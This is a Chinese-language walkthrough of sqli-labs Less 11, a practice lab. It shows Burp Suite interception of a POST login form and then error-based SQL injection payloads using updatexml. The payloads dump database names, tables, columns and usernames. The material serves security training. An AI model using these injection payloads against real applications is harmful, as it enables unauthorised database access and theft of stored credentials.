sqli-labs less 11

一、这一关开始是post型注入，选择用burp suite代理，开启拦截(intercept is on)

二、打开第11关，用bp拦截的话要把url的127.0.0.1改为本机的ip，要不然bp检测不到

三、提交表单发现页面开始转圈圈等待，bp也拦截到了报文

四、点击action，选择send to repeater，然后打开repeater模块

五、开始注入，在uname=后加1’，然后点击go，在右面的response查看返回的界面，发现界面有显示数据库错误信息

六、证明有注入点后，判断闭合方式，添加注释符然后go，发现页面不再报错，则为单引号闭合

uname=1'#&passwd=&submit=Submit

七、因为会显示数据库错误信息，所以选择报错注入，先来爆当前数据库

uname=1' and updatexml(1,concat('^',database()),1)#&passwd=&submit=Submit

八、爆所有数据库，可更改limit来更换显示

uname=1' and updatexml(1,concat('^',(select schema_name from information_schema.schemata limit 0,1)),1)#&passwd=&submit=Submit

九、爆指定库所有表

uname=1' and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)#&passwd=&submit=Submit

十、爆指定表所有列名

uname=1' and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users' limit 0,1)),1)#&passwd=&submit=Submit

十一、爆指定列所有数据

uname=1' and updatexml(1,concat('^',(select username from users  limit 0,1)),1)#&passwd=&submit=Submit

over~